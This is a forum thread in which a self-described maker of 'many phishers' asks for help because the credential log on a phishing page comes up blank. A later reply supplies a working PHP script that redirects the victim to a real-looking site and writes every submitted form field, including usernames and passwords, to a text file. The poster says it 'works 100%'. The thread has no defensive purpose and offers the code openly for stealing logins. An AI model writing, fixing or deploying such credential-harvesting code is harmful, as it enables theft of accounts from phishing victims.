Jump to content

Phishing help


Phisher228

Recommended Posts

Ive made many phishers, but for some reason, this one won't show any text in the log.txt.

I make the index with action=next.php and replace that with the login link.

But.

Something is wrong with the index, because all is working fine when they login, except in the log.txt that pops up, no text is shown. It's just blank.

Could someone look at the index and see what's wrong, or help me fix it, or what to do? Thanks.

Link to comment
Share on other sites

  • 3 months later...

<?php

header ('Location:http://www.example.com');

$handle = fopen("usernames.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

This works 100%

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...